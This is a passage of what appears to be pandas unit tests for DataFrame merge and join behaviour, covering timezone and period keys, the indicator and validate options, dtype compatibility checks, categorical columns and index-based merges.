},
columns=["value_x", "date2_x", "date", "value_y", "date2_y"],
)
tm.assert_frame_equal(result, expected)
def test_merge_datetime64tz_with_dst_transition(self):
# GH 18885
df1 = pd.DataFrame(
pd.date_range("2017-10-29 01:00", periods=4, freq="H", tz="Europe/Madrid"),
columns=["date"],
)
df1["value"] = 1
df2 = pd.DataFrame(
{
"date": pd.to_datetime(
[
"2017-10-29 03:00:00",
"2017-10-29 04:00:00",
"2017-10-29 05:00:00",
]
),
"value": 2,
}
)
df2["date"] = df2["date"].dt.tz_localize("UTC").dt.tz_convert("Europe/Madrid")
result = pd.merge(df1, df2, how="outer", on="date")
expected = pd.DataFrame(
{
"date": pd.date_range(
"2017-10-29 01:00", periods=7, freq="H", tz="Europe/Madrid"
),
"value_x": [1] * 4 + [np.nan] * 3,
"value_y": [np.nan] * 4 + [2] * 3,
}
)
tm.assert_frame_equal(result, expected)
def test_merge_non_unique_period_index(self):
# GH #16871
index = pd.period_range("2016-01-01", periods=16, freq="M")
df = DataFrame(list(range(len(index))), index=index, columns=["pnum"])
df2 = concat([df, df])
result = df.merge(df2, left_index=True, right_index=True, how="inner")
expected = DataFrame(
np.tile(np.arange(16, dtype=np.int64).repeat(2).reshape(-1, 1), 2),
columns=["pnum_x", "pnum_y"],
index=df2.sort_index().index,
)
tm.assert_frame_equal(result, expected)
def test_merge_on_periods(self):
left = pd.DataFrame(
{"key": pd.period_range("20151010", periods=2, freq="D"), "value": [1, 2]}
)
right = pd.DataFrame(
{
"key": pd.period_range("20151011", periods=3, freq="D"),
"value": [1, 2, 3],
}
)
expected = DataFrame(
{
"key": pd.period_range("20151010", periods=4, freq="D"),
"value_x": [1, 2, np.nan, np.nan],
"value_y": [np.nan, 1, 2, 3],
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
left = pd.DataFrame(
{"key": [1, 2], "value": pd.period_range("20151010", periods=2, freq="D")}
)
right = pd.DataFrame(
{"key": [2, 3], "value": pd.period_range("20151011", periods=2, freq="D")}
)
exp_x = pd.period_range("20151010", periods=2, freq="D")
exp_y = pd.period_range("20151011", periods=2, freq="D")
expected = DataFrame(
{
"key": [1, 2, 3],
"value_x": list(exp_x) + [pd.NaT],
"value_y": [pd.NaT] + list(exp_y),
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
assert result["value_x"].dtype == "Period[D]"
assert result["value_y"].dtype == "Period[D]"
def test_indicator(self):
# PR #10054. xref #7412 and closes #8790.
df1 = DataFrame(
{"col1": [0, 1], "col_conflict": [1, 2], "col_left": ["a", "b"]}
)
df1_copy = df1.copy()
df2 = DataFrame(
{
"col1": [1, 2, 3, 4, 5],
"col_conflict": [1, 2, 3, 4, 5],
"col_right": [2, 2, 2, 2, 2],
}
)
df2_copy = df2.copy()
df_result = DataFrame(
{
"col1": [0, 1, 2, 3, 4, 5],
"col_conflict_x": [1, 2, np.nan, np.nan, np.nan, np.nan],
"col_left": ["a", "b", np.nan, np.nan, np.nan, np.nan],
"col_conflict_y": [np.nan, 1, 2, 3, 4, 5],
"col_right": [np.nan, 2, 2, 2, 2, 2],
}
)
df_result["_merge"] = Categorical(
[
"left_only",
"both",
"right_only",
"right_only",
"right_only",
"right_only",
],
categories=["left_only", "right_only", "both"],
)
df_result = df_result[
[
"col1",
"col_conflict_x",
"col_left",
"col_conflict_y",
"col_right",
"_merge",
]
]
test = merge(df1, df2, on="col1", how="outer", indicator=True)
tm.assert_frame_equal(test, df_result)
test = df1.merge(df2, on="col1", how="outer", indicator=True)
tm.assert_frame_equal(test, df_result)
# No side effects
tm.assert_frame_equal(df1, df1_copy)
tm.assert_frame_equal(df2, df2_copy)
# Check with custom name
df_result_custom_name = df_result
df_result_custom_name = df_result_custom_name.rename(
columns={"_merge": "custom_name"}
)
test_custom_name = merge(
df1, df2, on="col1", how="outer", indicator="custom_name"
)
tm.assert_frame_equal(test_custom_name, df_result_custom_name)
test_custom_name = df1.merge(
df2, on="col1", how="outer", indicator="custom_name"
)
tm.assert_frame_equal(test_custom_name, df_result_custom_name)
# Check only accepts strings and booleans
msg = "indicator option can only accept boolean or string arguments"
with pytest.raises(ValueError, match=msg):
merge(df1, df2, on="col1", how="outer", indicator=5)
with pytest.raises(ValueError, match=msg):
df1.merge(df2, on="col1", how="outer", indicator=5)
# Check result integrity
test2 = merge(df1, df2, on="col1", how="left", indicator=True)
assert (test2._merge != "right_only").all()
test2 = df1.merge(df2, on="col1", how="left", indicator=True)
assert (test2._merge != "right_only").all()
test3 = merge(df1, df2, on="col1", how="right", indicator=True)
assert (test3._merge != "left_only").all()
test3 = df1.merge(df2, on="col1", how="right", indicator=True)
assert (test3._merge != "left_only").all()
test4 = merge(df1, df2, on="col1", how="inner", indicator=True)
assert (test4._merge == "both").all()
test4 = df1.merge(df2, on="col1", how="inner", indicator=True)
assert (test4._merge == "both").all()
# Check if working name in df
for i in ["_right_indicator", "_left_indicator", "_merge"]:
df_badcolumn = DataFrame({"col1": [1, 2], i: [2, 2]})
msg = (
"Cannot use `indicator=True` option when data contains a "
f"column named {i}|"
"Cannot use name of an existing column for indicator column"
)
with pytest.raises(ValueError, match=msg):
merge(df1, df_badcolumn, on="col1", how="outer", indicator=True)
with pytest.raises(ValueError, match=msg):
df1.merge(df_badcolumn, on="col1", how="outer", indicator=True)
# Check for name conflict with custom name
df_badcolumn = DataFrame({"col1": [1, 2], "custom_column_name": [2, 2]})
msg = "Cannot use name of an existing column for indicator column"
with pytest.raises(ValueError, match=msg):
merge(
df1,
df_badcolumn,
on="col1",
how="outer",
indicator="custom_column_name",
)
with pytest.raises(ValueError, match=msg):
df1.merge(
df_badcolumn, on="col1", how="outer", indicator="custom_column_name"
)
# Merge on multiple columns
df3 = DataFrame({"col1": [0, 1], "col2": ["a", "b"]})
df4 = DataFrame({"col1": [1, 1, 3], "col2": ["b", "x", "y"]})
hand_coded_result = DataFrame(
{"col1": [0, 1, 1, 3], "col2": ["a", "b", "x", "y"]}
)
hand_coded_result["_merge"] = Categorical(
["left_only", "both", "right_only", "right_only"],
categories=["left_only", "right_only", "both"],
)
test5 = merge(df3, df4, on=["col1", "col2"], how="outer", indicator=True)
tm.assert_frame_equal(test5, hand_coded_result)
test5 = df3.merge(df4, on=["col1", "col2"], how="outer", indicator=True)
tm.assert_frame_equal(test5, hand_coded_result)
def test_validation(self):
left = DataFrame(
{"a": ["a", "b", "c", "d"], "b": ["cat", "dog", "weasel", "horse"]},
index=range(4),
)
right = DataFrame(
{
"a": ["a", "b", "c", "d", "e"],
"c": ["meow", "bark", "um... weasel noise?", "nay", "chirp"],
},
index=range(5),
)
# Make sure no side effects.
left_copy = left.copy()
right_copy = right.copy()
result = merge(left, right, left_index=True, right_index=True, validate="1:1")
tm.assert_frame_equal(left, left_copy)
tm.assert_frame_equal(right, right_copy)
# make sure merge still correct
expected = DataFrame(
{
"a_x": ["a", "b", "c", "d"],
"b": ["cat", "dog", "weasel", "horse"],
"a_y": ["a", "b", "c", "d"],
"c": ["meow", "bark", "um... weasel noise?", "nay"],
},
index=range(4),
columns=["a_x", "b", "a_y", "c"],
)
result = merge(
left, right, left_index=True, right_index=True, validate="one_to_one"
)
tm.assert_frame_equal(result, expected)
expected_2 = DataFrame(
{
"a": ["a", "b", "c", "d"],
"b": ["cat", "dog", "weasel", "horse"],
"c": ["meow", "bark", "um... weasel noise?", "nay"],
},
index=range(4),
)
result = merge(left, right, on="a", validate="1:1")
tm.assert_frame_equal(left, left_copy)
tm.assert_frame_equal(right, right_copy)
tm.assert_frame_equal(result, expected_2)
result = merge(left, right, on="a", validate="one_to_one")
tm.assert_frame_equal(result, expected_2)
# One index, one column
expected_3 = DataFrame(
{
"b": ["cat", "dog", "weasel", "horse"],
"a": ["a", "b", "c", "d"],
"c": ["meow", "bark", "um... weasel noise?", "nay"],
},
columns=["b", "a", "c"],
index=range(4),
)
left_index_reset = left.set_index("a")
result = merge(
left_index_reset,
right,
left_index=True,
right_on="a",
validate="one_to_one",
)
tm.assert_frame_equal(result, expected_3)
# Dups on right
right_w_dups = right.append(pd.DataFrame({"a": ["e"], "c": ["moo"]}, index=[4]))
merge(
left,
right_w_dups,
left_index=True,
right_index=True,
validate="one_to_many",
)
msg = "Merge keys are not unique in right dataset; not a one-to-one merge"
with pytest.raises(MergeError, match=msg):
merge(
left,
right_w_dups,
left_index=True,
right_index=True,
validate="one_to_one",
)
with pytest.raises(MergeError, match=msg):
merge(left, right_w_dups, on="a", validate="one_to_one")
# Dups on left
left_w_dups = left.append(
pd.DataFrame({"a": ["a"], "c": ["cow"]}, index=[3]), sort=True
)
merge(
left_w_dups,
right,
left_index=True,
right_index=True,
validate="many_to_one",
)
msg = "Merge keys are not unique in left dataset; not a one-to-one merge"
with pytest.raises(MergeError, match=msg):
merge(
left_w_dups,
right,
left_index=True,
right_index=True,
validate="one_to_one",
)
with pytest.raises(MergeError, match=msg):
merge(left_w_dups, right, on="a", validate="one_to_one")
# Dups on both
merge(left_w_dups, right_w_dups, on="a", validate="many_to_many")
msg = "Merge keys are not unique in right dataset; not a many-to-one merge"
with pytest.raises(MergeError, match=msg):
merge(
left_w_dups,
right_w_dups,
left_index=True,
right_index=True,
validate="many_to_one",
)
msg = "Merge keys are not unique in left dataset; not a one-to-many merge"
with pytest.raises(MergeError, match=msg):
merge(left_w_dups, right_w_dups, on="a", validate="one_to_many")
# Check invalid arguments
msg = "Not a valid argument for validate"
with pytest.raises(ValueError, match=msg):
merge(left, right, on="a", validate="jibberish")
# Two column merge, dups in both, but jointly no dups.
left = DataFrame(
{
"a": ["a", "a", "b", "b"],
"b": [0, 1, 0, 1],
"c": ["cat", "dog", "weasel", "horse"],
},
index=range(4),
)
right = DataFrame(
{
"a": ["a", "a", "b"],
"b": [0, 1, 0],
"d": ["meow", "bark", "um... weasel noise?"],
},
index=range(3),
)
expected_multi = DataFrame(
{
"a": ["a", "a", "b"],
"b": [0, 1, 0],
"c": ["cat", "dog", "weasel"],
"d": ["meow", "bark", "um... weasel noise?"],
},
index=range(3),
)
msg = (
"Merge keys are not unique in either left or right dataset; "
"not a one-to-one merge"
)
with pytest.raises(MergeError, match=msg):
merge(left, right, on="a", validate="1:1")
result = merge(left, right, on=["a", "b"], validate="1:1")
tm.assert_frame_equal(result, expected_multi)
def test_merge_two_empty_df_no_division_error(self):
# GH17776, PR #17846
a = pd.DataFrame({"a": [], "b": [], "c": []})
with np.errstate(divide="raise"):
merge(a, a, on=("a", "b"))
@pytest.mark.parametrize("how", ["right", "outer"])
@pytest.mark.parametrize(
"index,expected_index",
[
(
CategoricalIndex([1, 2, 4]),
CategoricalIndex([1, 2, 4, None, None, None]),
),
(
DatetimeIndex(["2001-01-01", "2002-02-02", "2003-03-03"]),
DatetimeIndex(
["2001-01-01", "2002-02-02", "2003-03-03", pd.NaT, pd.NaT, pd.NaT]
),
),
(Float64Index([1, 2, 3]), Float64Index([1, 2, 3, None, None, None])),
(Int64Index([1, 2, 3]), Float64Index([1, 2, 3, None, None, None])),
(
IntervalIndex.from_tuples([(1, 2), (2, 3), (3, 4)]),
IntervalIndex.from_tuples(
[(1, 2), (2, 3), (3, 4), np.nan, np.nan, np.nan]
),
),
(
PeriodIndex(["2001-01-01", "2001-01-02", "2001-01-03"], freq="D"),
PeriodIndex(
["2001-01-01", "2001-01-02", "2001-01-03", pd.NaT, pd.NaT, pd.NaT],
freq="D",
),
),
(
TimedeltaIndex(["1d", "2d", "3d"]),
TimedeltaIndex(["1d", "2d", "3d", pd.NaT, pd.NaT, pd.NaT]),
),
],
)
def test_merge_on_index_with_more_values(self, how, index, expected_index):
# GH 24212
# pd.merge gets [0, 1, 2, -1, -1, -1] as left_indexer, ensure that
# -1 is interpreted as a missing value instead of the last element
df1 = pd.DataFrame({"a": [0, 1, 2], "key": [0, 1, 2]}, index=index)
df2 = pd.DataFrame({"b": [0, 1, 2, 3, 4, 5]})
result = df1.merge(df2, left_on="key", right_index=True, how=how)
expected = pd.DataFrame(
[
[0, 0, 0],
[1, 1, 1],
[2, 2, 2],
[np.nan, 3, 3],
[np.nan, 4, 4],
[np.nan, 5, 5],
],
columns=["a", "key", "b"],
)
expected.set_index(expected_index, inplace=True)
tm.assert_frame_equal(result, expected)
def test_merge_right_index_right(self):
# Note: the expected output here is probably incorrect.
# See https://github.com/pandas-dev/pandas/issues/17257 for more.
# We include this as a regression test for GH-24897.
left = pd.DataFrame({"a": [1, 2, 3], "key": [0, 1, 1]})
right = pd.DataFrame({"b": [1, 2, 3]})
expected = pd.DataFrame(
{"a": [1, 2, 3, None], "key": [0, 1, 1, 2], "b": [1, 2, 2, 3]},
columns=["a", "key", "b"],
index=[0, 1, 2, np.nan],
)
result = left.merge(right, left_on="key", right_index=True, how="right")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("how", ["left", "right"])
def test_merge_preserves_row_order(self, how):
# GH 27453
left_df = pd.DataFrame({"animal": ["dog", "pig"], "max_speed": [40, 11]})
right_df = pd.DataFrame({"animal": ["quetzal", "pig"], "max_speed": [80, 11]})
result = left_df.merge(right_df, on=["animal", "max_speed"], how=how)
if how == "right":
expected = pd.DataFrame(
{"animal": ["quetzal", "pig"], "max_speed": [80, 11]}
)
else:
expected = pd.DataFrame({"animal": ["dog", "pig"], "max_speed": [40, 11]})
tm.assert_frame_equal(result, expected)
def test_merge_take_missing_values_from_index_of_other_dtype(self):
# GH 24212
left = pd.DataFrame(
{
"a": [1, 2, 3],
"key": pd.Categorical(["a", "a", "b"], categories=list("abc")),
}
)
right = pd.DataFrame(
{"b": [1, 2, 3]}, index=pd.CategoricalIndex(["a", "b", "c"])
)
result = left.merge(right, left_on="key", right_index=True, how="right")
expected = pd.DataFrame(
{
"a": [1, 2, 3, None],
"key": pd.Categorical(["a", "a", "b", "c"]),
"b": [1, 1, 2, 3],
},
index=[0, 1, 2, np.nan],
)
expected = expected.reindex(columns=["a", "key", "b"])
tm.assert_frame_equal(result, expected)
def test_merge_readonly(self):
# https://github.com/pandas-dev/pandas/issues/27943
data1 = pd.DataFrame(
np.arange(20).reshape((4, 5)) + 1, columns=["a", "b", "c", "d", "e"]
)
data2 = pd.DataFrame(
np.arange(20).reshape((5, 4)) + 1, columns=["a", "b", "x", "y"]
)
data1._mgr.blocks[0].values.flags.writeable = False
data1.merge(data2) # no error
def _check_merge(x, y):
for how in ["inner", "left", "outer"]:
result = x.join(y, how=how)
expected = merge(x.reset_index(), y.reset_index(), how=how, sort=True)
expected = expected.set_index("index")
# TODO check_names on merge?
tm.assert_frame_equal(result, expected, check_names=False)
class TestMergeDtypes:
@pytest.mark.parametrize(
"right_vals", [["foo", "bar"], Series(["foo", "bar"]).astype("category")]
)
def test_different(self, right_vals):
left = DataFrame(
{
"A": ["foo", "bar"],
"B": Series(["foo", "bar"]).astype("category"),
"C": [1, 2],
"D": [1.0, 2.0],
"E": Series([1, 2], dtype="uint64"),
"F": Series([1, 2], dtype="int32"),
}
)
right = DataFrame({"A": right_vals})
# GH 9780
# We allow merging on object and categorical cols and cast
# categorical cols to object
result = pd.merge(left, right, on="A")
assert is_object_dtype(result.A.dtype)
@pytest.mark.parametrize("d1", [np.int64, np.int32, np.int16, np.int8, np.uint8])
@pytest.mark.parametrize("d2", [np.int64, np.float64, np.float32, np.float16])
def test_join_multi_dtypes(self, d1, d2):
dtype1 = np.dtype(d1)
dtype2 = np.dtype(d2)
left = DataFrame(
{
"k1": np.array([0, 1, 2] * 8, dtype=dtype1),
"k2": ["foo", "bar"] * 12,
"v": np.array(np.arange(24), dtype=np.int64),
}
)
index = MultiIndex.from_tuples([(2, "bar"), (1, "foo")])
right = DataFrame({"v2": np.array([5, 7], dtype=dtype2)}, index=index)
result = left.join(right, on=["k1", "k2"])
expected = left.copy()
if dtype2.kind == "i":
dtype2 = np.dtype("float64")
expected["v2"] = np.array(np.nan, dtype=dtype2)
expected.loc[(expected.k1 == 2) & (expected.k2 == "bar"), "v2"] = 5
expected.loc[(expected.k1 == 1) & (expected.k2 == "foo"), "v2"] = 7
tm.assert_frame_equal(result, expected)
result = left.join(right, on=["k1", "k2"], sort=True)
expected.sort_values(["k1", "k2"], kind="mergesort", inplace=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"int_vals, float_vals, exp_vals",
[
([1, 2, 3], [1.0, 2.0, 3.0], {"X": [1, 2, 3], "Y": [1.0, 2.0, 3.0]}),
([1, 2, 3], [1.0, 3.0], {"X": [1, 3], "Y": [1.0, 3.0]}),
([1, 2], [1.0, 2.0, 3.0], {"X": [1, 2], "Y": [1.0, 2.0]}),
],
)
def test_merge_on_ints_floats(self, int_vals, float_vals, exp_vals):
# GH 16572
# Check that float column is not cast to object if
# merging on float and int columns
A = DataFrame({"X": int_vals})
B = DataFrame({"Y": float_vals})
expected = DataFrame(exp_vals)
result = A.merge(B, left_on="X", right_on="Y")
tm.assert_frame_equal(result, expected)
result = B.merge(A, left_on="Y", right_on="X")
tm.assert_frame_equal(result, expected[["Y", "X"]])
def test_merge_key_dtype_cast(self):
# GH 17044
df1 = DataFrame({"key": [1.0, 2.0], "v1": [10, 20]}, columns=["key", "v1"])
df2 = DataFrame({"key": [2], "v2": [200]}, columns=["key", "v2"])
result = df1.merge(df2, on="key", how="left")
expected = DataFrame(
{"key": [1.0, 2.0], "v1": [10, 20], "v2": [np.nan, 200.0]},
columns=["key", "v1", "v2"],
)
tm.assert_frame_equal(result, expected)
def test_merge_on_ints_floats_warning(self):
# GH 16572
# merge will produce a warning when merging on int and
# float columns where the float values are not exactly
# equal to their int representation
A = DataFrame({"X": [1, 2, 3]})
B = DataFrame({"Y": [1.1, 2.5, 3.0]})
expected = DataFrame({"X": [3], "Y": [3.0]})
with tm.assert_produces_warning(UserWarning):
result = A.merge(B, left_on="X", right_on="Y")
tm.assert_frame_equal(result, expected)
with tm.assert_produces_warning(UserWarning):
result = B.merge(A, left_on="Y", right_on="X")
tm.assert_frame_equal(result, expected[["Y", "X"]])
# test no warning if float has NaNs
B = DataFrame({"Y": [np.nan, np.nan, 3.0]})
with tm.assert_produces_warning(None):
result = B.merge(A, left_on="Y", right_on="X")
tm.assert_frame_equal(result, expected[["Y", "X"]])
def test_merge_incompat_infer_boolean_object(self):
# GH21119: bool + object bool merge OK
df1 = DataFrame({"key": Series([True, False], dtype=object)})
df2 = DataFrame({"key": [True, False]})
expected = DataFrame({"key": [True, False]}, dtype=object)
result = pd.merge(df1, df2, on="key")
tm.assert_frame_equal(result, expected)
result = pd.merge(df2, df1, on="key")
tm.assert_frame_equal(result, expected)
# with missing value
df1 = DataFrame({"key": Series([True, False, np.nan], dtype=object)})
df2 = DataFrame({"key": [True, False]})
expected = DataFrame({"key": [True, False]}, dtype=object)
result = pd.merge(df1, df2, on="key")
tm.assert_frame_equal(result, expected)
result = pd.merge(df2, df1, on="key")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"df1_vals, df2_vals",
[
# merge on category coerces to object
([0, 1, 2], Series(["a", "b", "a"]).astype("category")),
([0.0, 1.0, 2.0], Series(["a", "b", "a"]).astype("category")),
# no not infer
([0, 1], pd.Series([False, True], dtype=object)),
([0, 1], pd.Series([False, True], dtype=bool)),
],
)
def test_merge_incompat_dtypes_are_ok(self, df1_vals, df2_vals):
# these are explicitly allowed incompat merges, that pass thru
# the result type is dependent on if the values on the rhs are
# inferred, otherwise these will be coerced to object
df1 = DataFrame({"A": df1_vals})
df2 = DataFrame({"A": df2_vals})
result = pd.merge(df1, df2, on=["A"])
assert is_object_dtype(result.A.dtype)
result = pd.merge(df2, df1, on=["A"])
assert is_object_dtype(result.A.dtype)
@pytest.mark.parametrize(
"df1_vals, df2_vals",
[
# do not infer to numeric
(Series([1, 2], dtype="uint64"), ["a", "b", "c"]),
(Series([1, 2], dtype="int32"), ["a", "b", "c"]),
([0, 1, 2], ["0", "1", "2"]),
([0.0, 1.0, 2.0], ["0", "1", "2"]),
([0, 1, 2], ["0", "1", "2"]),
(
pd.date_range("1/1/2011", periods=2, freq="D"),
["2011-01-01", "2011-01-02"],
),
(pd.date_range("1/1/2011", periods=2, freq="D"), [0, 1]),
(pd.date_range("1/1/2011", periods=2, freq="D"), [0.0, 1.0]),
(
pd.date_range("20130101", periods=3),
pd.date_range("20130101", periods=3, tz="US/Eastern"),
),
],
)
def test_merge_incompat_dtypes_error(self, df1_vals, df2_vals):
# GH 9780, GH 15800
# Raise a ValueError when a user tries to merge on
# dtypes that are incompatible (e.g., obj and int/float)
df1 = DataFrame({"A": df1_vals})
df2 = DataFrame({"A": df2_vals})
msg = (
f"You are trying to merge on {df1['A'].dtype} and "
f"{df2['A'].dtype} columns. If you wish to proceed "
"you should use pd.concat"
)
msg = re.escape(msg)
with pytest.raises(ValueError, match=msg):
pd.merge(df1, df2, on=["A"])
# Check that error still raised when swapping order of dataframes
msg = (
f"You are trying to merge on {df2['A'].dtype} and "
f"{df1['A'].dtype} columns. If you wish to proceed "
"you should use pd.concat"
)
msg = re.escape(msg)
with pytest.raises(ValueError, match=msg):
pd.merge(df2, df1, on=["A"])
@pytest.fixture
def left():
np.random.seed(1234)
return DataFrame(
{
"X": Series(np.random.choice(["foo", "bar"], size=(10,))).astype(
CDT(["foo", "bar"])
),
"Y": np.random.choice(["one", "two", "three"], size=(10,)),
}
)
@pytest.fixture
def right():
np.random.seed(1234)
return DataFrame(
{"X": Series(["foo", "bar"]).astype(CDT(["foo", "bar"])), "Z": [1, 2]}
)
class TestMergeCategorical:
def test_identical(self, left):
# merging on the same, should preserve dtypes
merged = pd.merge(left, left, on="X")
result = merged.dtypes.sort_index()
expected = Series(
[CategoricalDtype(), np.dtype("O"), np.dtype("O")],
index=["X", "Y_x", "Y_y"],
)
tm.assert_series_equal(result, expected)
def test_basic(self, left, right):
# we have matching Categorical dtypes in X
# so should preserve the merged column
merged = pd.merge(left, right, on="X")
result = merged.dtypes.sort_index()
expected = Series(
[CategoricalDtype(), np.dtype("O"), np.dtype("int64")],
index=["X", "Y", "Z"],
)
tm.assert_series_equal(result, expected)
def test_merge_categorical(self):
# GH 9426
right = DataFrame(
{
"c": {0: "a", 1: "b", 2: "c", 3: "d", 4: "e"},
"d": {0: "null", 1: "null", 2: "null", 3: "null", 4: "null"},
}
)
left = DataFrame(
{
"a": {0: "f", 1: "f", 2: "f", 3: "f", 4: "f"},
"b": {0: "g", 1: "g", 2: "g", 3: "g", 4: "g"},
}
)
df = pd.merge(left, right, how="left", left_on="b", right_on="c")
# object-object
expected = df.copy()
# object-cat
# note that we propagate the category
# because we don't have any matching rows
cright = right.copy()
cright["d"] = cright["d"].astype("category")
result = pd.merge(left, cright, how="left", left_on="b", right_on="c")
expected["d"] = expected["d"].astype(CategoricalDtype(["null"]))
tm.assert_frame_equal(result, expected)
# cat-object
cleft = left.copy()
cleft["b"] = cleft["b"].astype("category")
result = pd.merge(cleft, cright, how="left", left_on="b", right_on="c")
tm.assert_frame_equal(result, expected)
# cat-cat
cright = right.copy()
cright["d"] = cright["d"].astype("category")
cleft = left.copy()
cleft["b"] = cleft["b"].astype("category")
result = pd.merge(cleft, cright, how="left", left_on="b", right_on="c")
tm.assert_frame_equal(result, expected)
def tests_merge_categorical_unordered_equal(self):
# GH-19551
df1 = DataFrame(
{
"Foo": Categorical(["A", "B", "C"], categories=["A", "B", "C"]),
"Left": ["A0", "B0", "C0"],
}
)
df2 = DataFrame(
{
"Foo": Categorical(["C", "B", "A"], categories=["C", "B", "A"]),
"Right": ["C1", "B1", "A1"],
}
)
result = pd.merge(df1, df2, on=["Foo"])
expected = DataFrame(
{
"Foo": pd.Categorical(["A", "B", "C"]),
"Left": ["A0", "B0", "C0"],
"Right": ["A1", "B1", "C1"],
}
)
tm.assert_frame_equal(result, expected)
def test_other_columns(self, left, right):
# non-merge columns should preserve if possible
right = right.assign(Z=right.Z.astype("category"))
merged = pd.merge(left, right, on="X")
result = merged.dtypes.sort_index()
expected = Series(
[CategoricalDtype(), np.dtype("O"), CategoricalDtype()],
index=["X", "Y", "Z"],
)
tm.assert_series_equal(result, expected)
# categories are preserved
assert left.X.values.is_dtype_equal(merged.X.values)
assert right.Z.values.is_dtype_equal(merged.Z.values)
@pytest.mark.parametrize(
"change",
[
lambda x: x,
lambda x: x.astype(CDT(["foo", "bar", "bah"])),
lambda x: x.astype(CDT(ordered=True)),
],
)
def test_dtype_on_merged_different(self, change, join_type, left, right):
# our merging columns, X now has 2 different dtypes
# so we must be object as a result
X = change(right.X.astype("object"))
right = right.assign(X=X)
assert is_categorical_dtype(left.X.values.dtype)
# assert not left.X.values.is_dtype_equal(right.X.values)
merged = pd.merge(left, right, on="X", how=join_type)
result = merged.dtypes.sort_index()
expected = Series(
[np.dtype("O"), np.dtype("O"), np.dtype("int64")], index=["X", "Y", "Z"]
)
tm.assert_series_equal(result, expected)
def test_self_join_multiple_categories(self):
# GH 16767
# non-duplicates should work with multiple categories
m = 5
df = pd.DataFrame(
{
"a": ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"] * m,
"b": ["t", "w", "x", "y", "z"] * 2 * m,
"c": [
letter
for each in ["m", "n", "u", "p", "o"]
for letter in [each] * 2 * m
],
"d": [
letter
for each in [
"aa",
"bb",
"cc",
"dd",
"ee",
"ff",
"gg",
"hh",
"ii",
"jj",
]
for letter in [each] * m
],
}
)
# change them all to categorical variables
df = df.apply(lambda x: x.astype("category"))
# self-join should equal ourselves
result = pd.merge(df, df, on=list(df.columns))
tm.assert_frame_equal(result, df)
def test_dtype_on_categorical_dates(self):
# GH 16900
# dates should not be coerced to ints
df = pd.DataFrame(
[[date(2001, 1, 1), 1.1], [date(2001, 1, 2), 1.3]], columns=["date", "num2"]
)
df["date"] = df["date"].astype("category")
df2 = pd.DataFrame(
[[date(2001, 1, 1), 1.3], [date(2001, 1, 3), 1.4]], columns=["date", "num4"]
)
df2["date"] = df2["date"].astype("category")
expected_outer = pd.DataFrame(
[
[pd.Timestamp("2001-01-01"), 1.1, 1.3],
[pd.Timestamp("2001-01-02"), 1.3, np.nan],
[pd.Timestamp("2001-01-03"), np.nan, 1.4],
],
columns=["date", "num2", "num4"],
)
result_outer = pd.merge(df, df2, how="outer", on=["date"])
tm.assert_frame_equal(result_outer, expected_outer)
expected_inner = pd.DataFrame(
[[pd.Timestamp("2001-01-01"), 1.1, 1.3]], columns=["date", "num2", "num4"]
)
result_inner = pd.merge(df, df2, how="inner", on=["date"])
tm.assert_frame_equal(result_inner, expected_inner)
@pytest.mark.parametrize("ordered", [True, False])
@pytest.mark.parametrize(
"category_column,categories,expected_categories",
[
([False, True, True, False], [True, False], [True, False]),
([2, 1, 1, 2], [1, 2], [1, 2]),
(["False", "True", "True", "False"], ["True", "False"], ["True", "False"]),
],
)
def test_merging_with_bool_or_int_cateorical_column(
self, category_column, categories, expected_categories, ordered
):
# GH 17187
# merging with a boolean/int categorical column
df1 = pd.DataFrame({"id": [1, 2, 3, 4], "cat": category_column})
df1["cat"] = df1["cat"].astype(CDT(categories, ordered=ordered))
df2 = pd.DataFrame({"id": [2, 4], "num": [1, 9]})
result = df1.merge(df2)
expected = pd.DataFrame(
{"id": [2, 4], "cat": expected_categories, "num": [1, 9]}
)
expected["cat"] = expected["cat"].astype(CDT(categories, ordered=ordered))
tm.assert_frame_equal(expected, result)
def test_merge_on_int_array(self):
# GH 23020
df = pd.DataFrame({"A": pd.Series([1, 2, np.nan], dtype="Int64"), "B": 1})
result = pd.merge(df, df, on="A")
expected = pd.DataFrame(
{"A": pd.Series([1, 2, np.nan], dtype="Int64"), "B_x": 1, "B_y": 1}
)
tm.assert_frame_equal(result, expected)
@pytest.fixture
def left_df():
return DataFrame({"a": [20, 10, 0]}, index=[2, 1, 0])
@pytest.fixture
def right_df():
return DataFrame({"b": [300, 100, 200]}, index=[3, 1, 2])
class TestMergeOnIndexes:
@pytest.mark.parametrize(
"how, sort, expected",
[
("inner", False, DataFrame({"a": [20, 10], "b": [200, 100]}, index=[2, 1])),
("inner", True, DataFrame({"a": [10, 20], "b": [100, 200]}, index=[1, 2])),
(
"left",
False,
DataFrame({"a": [20, 10, 0], "b": [200, 100, np.nan]}, index=[2, 1, 0]),
),
(
"left",
True,
DataFrame({"a": [0, 10, 20], "b": [np.nan, 100, 200]}, index=[0, 1, 2]),
),
(
"right",
False,
DataFrame(
{"a": [np.nan, 10, 20], "b": [300, 100, 200]}, index=[3, 1, 2]
),
),
(
"right",
True,
DataFrame(
{"a": [10, 20, np.nan], "b": [100, 200, 300]}, index=[1, 2, 3]
),
),
(
"outer",
False,
DataFrame(
{"a": [0, 10, 20, np.nan], "b": [np.nan, 100, 200, 300]},
index=[0, 1, 2, 3],
),
),
(
"outer",
True,
DataFrame(
{"a": [0, 10, 20, np.nan], "b": [np.nan, 100, 200, 300]},
index=[0, 1, 2, 3],
),
),
],
)
def test_merge_on_indexes(self, left_df, right_df, how, sort, expected):
result = pd.merge(
left_df, right_df, left_index=True, right_index=True, how=how, sort=sort
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"index",
[
CategoricalIndex(["A", "B"], categories=["A", "B"], name="index_col"),
Float64Index([1.0, 2.0], name="index_col"),
Int64Index([1, 2], name="index_col"),
UInt64Index([1, 2], name="index_col"),
RangeIndex(start=0, stop=2, name="index_col"),
DatetimeIndex(["2018-01-01", "2018-01-02"], name="index_col"),
],
ids=lambda x: type(x).__name__,
)
def test_merge_index_types(index):
# gh-20777
# assert key access is consistent across index types
left = DataFrame({"left_data": [1, 2]}, index=index)
right = DataFrame({"right_data": [1.0, 2.0]}, index=index)
result = left.merge(right, on=["index_col"])
expected = DataFrame(
